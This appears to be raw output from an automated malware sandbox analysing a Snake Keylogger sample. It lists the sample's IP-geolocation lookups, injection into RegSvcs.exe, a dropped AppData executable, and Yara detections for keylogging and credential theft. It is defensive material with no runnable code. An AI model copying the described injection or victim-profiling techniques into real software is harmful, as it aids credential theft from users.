Source: unknown	HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.4:49737 version: TLS 1.0
Source: unknown	HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.4:49747 version: TLS 1.0

Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive

Source: global traffic	DNS traffic detected: DNS query: checkip.dyndns.org
Source: global traffic	DNS traffic detected: DNS query: reallyfreegeoip.org

Source: RegSvcs.exe, 00000006.00000002.1824025899.0000000003303000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000006.00000002.1824025899.00000000032F6000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000006.00000002.1824025899.00000000032DB000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000006.00000002.1824025899.00000000032E8000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000006.00000002.1824025899.0000000003248000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000006.00000002.1824025899.000000000333F000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000006.00000002.1824025899.0000000003331000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000B.00000002.1875749509.0000000002DDB000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000B.00000002.1875749509.0000000002DE8000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000B.00000002.1875749509.0000000002E03000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000B.00000002.1875749509.0000000002D48000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000B.00000002.1875749509.0000000002DF5000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000B.00000002.1875749509.0000000002E30000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://checkip.dyndns.com
Source: RegSvcs.exe, 00000006.00000002.1824025899.0000000003239000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000006.00000002.1824025899.0000000003303000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000006.00000002.1824025899.000000000328B000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000006.00000002.1824025899.00000000032F6000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000006.00000002.1824025899.0000000003311000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000006.00000002.1824025899.00000000032DB000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000006.00000002.1824025899.00000000032E8000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000006.00000002.1824025899.0000000003248000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000006.00000002.1824025899.000000000333F000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000006.00000002.1824025899.0000000003331000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000B.00000002.1875749509.0000000002DDB000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000B.00000002.1875749509.0000000002E10000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000B.00000002.1875749509.0000000002DE8000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000B.00000002.1875749509.0000000002E03000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000B.00000002.1875749509.0000000002D8B000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000B.00000002.1875749509.0000000002D3C000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000B.00000002.1875749509.0000000002D48000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000B.00000002.1875749509.0000000002DF5000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000B.00000002.1875749509.0000000002E30000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://checkip.dyndns.org
Source: RegSvcs.exe, 00000006.00000002.1824025899.0000000003181000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000B.00000002.1875749509.0000000002C81000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://checkip.dyndns.org/
Source: file.exe, 00000000.00000002.1734665410.0000000004501000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000006.00000002.1821617182.0000000000402000.00000040.00000400.00020000.00000000.sdmp, NPadpxkCGKGoat.exe, 00000008.00000002.1784692461.0000000003E04000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://checkip.dyndns.org/q
Source: file.exe, NPadpxkCGKGoat.exe.0.dr	String found in binary or memory: http://crl.comodoca.com/COMODORSACertificationAuthority.crl0q
Source: file.exe, NPadpxkCGKGoat.exe.0.dr	String found in binary or memory: http://crl.comodoca.com/COMODORSACodeSigningCA.crl0t
Source: file.exe, NPadpxkCGKGoat.exe.0.dr	String found in binary or memory: http://ocsp.comodoca.com0
Source: RegSvcs.exe, 00000006.00000002.1824025899.0000000003303000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000006.00000002.1824025899.00000000032F6000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000006.00000002.1824025899.00000000032DB000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000006.00000002.1824025899.0000000003260000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000006.00000002.1824025899.00000000032E8000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000006.00000002.1824025899.000000000333F000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000006.00000002.1824025899.0000000003331000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000B.00000002.1875749509.0000000002DDB000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000B.00000002.1875749509.0000000002DE8000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000B.00000002.1875749509.0000000002D60000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000B.00000002.1875749509.0000000002E03000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000B.00000002.1875749509.0000000002DF5000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000B.00000002.1875749509.0000000002E30000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://reallyfreegeoip.org
Source: file.exe, 00000000.00000002.1733189829.0000000003016000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000006.00000002.1824025899.0000000003181000.00000004.00000800.00020000.00000000.sdmp, NPadpxkCGKGoat.exe, 00000008.00000002.1782802896.00000000025A9000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000B.00000002.1875749509.0000000002C81000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: file.exe, 00000000.00000002.1738099298.0000000009782000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
Source: file.exe, 00000000.00000002.1738099298.0000000009782000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.carterandcone.coml
Source: file.exe, 00000000.00000002.1738099298.0000000009782000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.com
Source: file.exe, 00000000.00000002.1738099298.0000000009782000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.com/designers
Source: file.exe, 00000000.00000002.1738099298.0000000009782000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.com/designers/?
Source: file.exe, 00000000.00000002.1738099298.0000000009782000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
Source: file.exe, 00000000.00000002.1738099298.0000000009782000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.com/designers/frere-user.html
Source: file.exe, 00000000.00000002.1738099298.0000000009782000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.com/designers8
Source: file.exe, 00000000.00000002.1738099298.0000000009782000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.com/designers?
Source: file.exe, 00000000.00000002.1738099298.0000000009782000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.com/designersG
Source: file.exe, 00000000.00000002.1738099298.0000000009782000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fonts.com
Source: file.exe, 00000000.00000002.1738099298.0000000009782000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.founder.com.cn/cn
Source: file.exe, 00000000.00000002.1738099298.0000000009782000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.founder.com.cn/cn/bThe
Source: file.exe, 00000000.00000002.1738099298.0000000009782000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.founder.com.cn/cn/cThe
Source: file.exe, 00000000.00000002.1738099298.0000000009782000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.galapagosdesign.com/DPlease
Source: file.exe, 00000000.00000002.1738099298.0000000009782000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
Source: file.exe, 00000000.00000002.1738099298.0000000009782000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.goodfont.co.kr
Source: file.exe, 00000000.00000002.1738099298.0000000009782000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.jiyu-kobo.co.jp/
Source: file.exe, 00000000.00000002.1738099298.0000000009782000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.sajatypeworks.com
Source: file.exe, 00000000.00000002.1738099298.0000000009782000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.sakkal.com
Source: file.exe, 00000000.00000002.1738099298.0000000009782000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.sandoll.co.kr
Source: file.exe, 00000000.00000002.1738099298.0000000009782000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.tiro.com
Source: file.exe, 00000000.00000002.1738099298.0000000009782000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.typography.netD
Source: file.exe, 00000000.00000002.1738099298.0000000009782000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.urwpp.deDPlease
Source: file.exe, 00000000.00000002.1738099298.0000000009782000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.zhongyicts.com.cn
Source: RegSvcs.exe, 00000006.00000002.1824025899.0000000003303000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000006.00000002.1824025899.000000000328B000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000006.00000002.1824025899.00000000032F6000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000006.00000002.1824025899.00000000032DB000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000006.00000002.1824025899.00000000032E8000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000006.00000002.1824025899.0000000003248000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000006.00000002.1824025899.000000000333F000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000006.00000002.1824025899.0000000003331000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000B.00000002.1875749509.0000000002DDB000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000B.00000002.1875749509.0000000002DE8000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000B.00000002.1875749509.0000000002E03000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000B.00000002.1875749509.0000000002D8B000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000B.00000002.1875749509.0000000002D48000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000B.00000002.1875749509.0000000002DF5000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000B.00000002.1875749509.0000000002E30000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://reallyfreegeoip.org
Source: file.exe, 00000000.00000002.1734665410.0000000004501000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000006.00000002.1821617182.0000000000402000.00000040.00000400.00020000.00000000.sdmp, RegSvcs.exe, 00000006.00000002.1824025899.0000000003248000.00000004.00000800.00020000.00000000.sdmp, NPadpxkCGKGoat.exe, 00000008.00000002.1784692461.0000000003E04000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000B.00000002.1875749509.0000000002D48000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://reallyfreegeoip.org/xml/
Source: RegSvcs.exe, 0000000B.00000002.1875749509.0000000002E30000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://reallyfreegeoip.org/xml/8.46.123.189
Source: RegSvcs.exe, 00000006.00000002.1824025899.0000000003303000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000006.00000002.1824025899.000000000328B000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000006.00000002.1824025899.00000000032F6000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000006.00000002.1824025899.00000000032DB000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000006.00000002.1824025899.00000000032E8000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000006.00000002.1824025899.000000000333F000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000006.00000002.1824025899.0000000003331000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000B.00000002.1875749509.0000000002DDB000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000B.00000002.1875749509.0000000002DE8000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000B.00000002.1875749509.0000000002E03000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000B.00000002.1875749509.0000000002D8B000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000B.00000002.1875749509.0000000002DF5000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000B.00000002.1875749509.0000000002E30000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://reallyfreegeoip.org/xml/8.46.123.189$
Source: file.exe, NPadpxkCGKGoat.exe.0.dr	String found in binary or memory: https://www.chiark.greenend.org.uk/~sgtatham/putty/0

Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49744
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49766
Source: unknown	Network traffic detected: HTTP traffic on port 49758 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49742
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49763
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49761
Source: unknown	Network traffic detected: HTTP traffic on port 49748 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49766 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49770 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49751 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49738
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49737
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49759
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49758
Source: unknown	Network traffic detected: HTTP traffic on port 49759 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49738 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49755 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49755
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49754
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49751
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49750
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49770
Source: unknown	Network traffic detected: HTTP traffic on port 49742 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49761 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49747 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49763 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49744 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49750 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49754 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49748
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49747
Source: unknown	Network traffic detected: HTTP traffic on port 49737 -> 443

System Summary

Malicious sample detected (through community Yara rule)

Source: 8.2.NPadpxkCGKGoat.exe.3e090b8.2.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 8.2.NPadpxkCGKGoat.exe.3e090b8.2.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 8.2.NPadpxkCGKGoat.exe.3e090b8.2.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 8.2.NPadpxkCGKGoat.exe.3e090b8.2.unpack, type: UNPACKEDPE	Matched rule: Detects Snake Keylogger Author: ditekSHen
Source: 6.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 6.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 6.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 6.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Detects Snake Keylogger Author: ditekSHen
Source: 0.2.file.exe.4771620.3.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 0.2.file.exe.4771620.3.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 0.2.file.exe.4771620.3.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 0.2.file.exe.4771620.3.unpack, type: UNPACKEDPE	Matched rule: Detects Snake Keylogger Author: ditekSHen
Source: 8.2.NPadpxkCGKGoat.exe.3eb06e8.3.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 8.2.NPadpxkCGKGoat.exe.3eb06e8.3.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 0.2.file.exe.4771620.3.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 8.2.NPadpxkCGKGoat.exe.3eb06e8.3.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 8.2.NPadpxkCGKGoat.exe.3eb06e8.3.unpack, type: UNPACKEDPE	Matched rule: Detects Snake Keylogger Author: ditekSHen
Source: 0.2.file.exe.4771620.3.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 0.2.file.exe.4771620.3.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 0.2.file.exe.4771620.3.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Snake Keylogger Author: ditekSHen
Source: 0.2.file.exe.46a75e0.2.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 0.2.file.exe.46a75e0.2.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 0.2.file.exe.46a75e0.2.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Snake Keylogger Author: ditekSHen
Source: 0.2.file.exe.470c600.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 0.2.file.exe.470c600.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 0.2.file.exe.470c600.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 0.2.file.exe.470c600.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Snake Keylogger Author: ditekSHen
Source: 8.2.NPadpxkCGKGoat.exe.3eb06e8.3.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 8.2.NPadpxkCGKGoat.exe.3eb06e8.3.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 8.2.NPadpxkCGKGoat.exe.3eb06e8.3.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Snake Keylogger Author: ditekSHen
Source: 8.2.NPadpxkCGKGoat.exe.3e090b8.2.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 8.2.NPadpxkCGKGoat.exe.3e090b8.2.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 8.2.NPadpxkCGKGoat.exe.3e090b8.2.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Snake Keylogger Author: ditekSHen
Source: 00000006.00000002.1821617182.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 00000006.00000002.1821617182.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects Snake Keylogger Author: ditekSHen
Source: 00000000.00000002.1734665410.0000000004501000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 00000000.00000002.1734665410.0000000004501000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects Snake Keylogger Author: ditekSHen
Source: 00000008.00000002.1784692461.0000000003E04000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 00000008.00000002.1784692461.0000000003E04000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects Snake Keylogger Author: ditekSHen
Source: Process Memory Space: file.exe PID: 6784, type: MEMORYSTR	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: Process Memory Space: file.exe PID: 6784, type: MEMORYSTR	Matched rule: Detects Snake Keylogger Author: ditekSHen
Source: Process Memory Space: RegSvcs.exe PID: 2120, type: MEMORYSTR	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: Process Memory Space: RegSvcs.exe PID: 2120, type: MEMORYSTR	Matched rule: Detects Snake Keylogger Author: ditekSHen
Source: Process Memory Space: NPadpxkCGKGoat.exe PID: 7236, type: MEMORYSTR	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: Process Memory Space: NPadpxkCGKGoat.exe PID: 7236, type: MEMORYSTR	Matched rule: Detects Snake Keylogger Author: ditekSHen

Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_01200814 NtQueryInformationProcess,	0_2_01200814
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_01209C29 NtQueryInformationProcess,	0_2_01209C29
Source: C:\Users\user\AppData\Roaming\NPadpxkCGKGoat.exe	Code function: 8_2_02560814 NtQueryInformationProcess,	8_2_02560814
Source: C:\Users\user\AppData\Roaming\NPadpxkCGKGoat.exe	Code function: 8_2_02569C29 NtQueryInformationProcess,	8_2_02569C29

Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_012035C0	0_2_012035C0
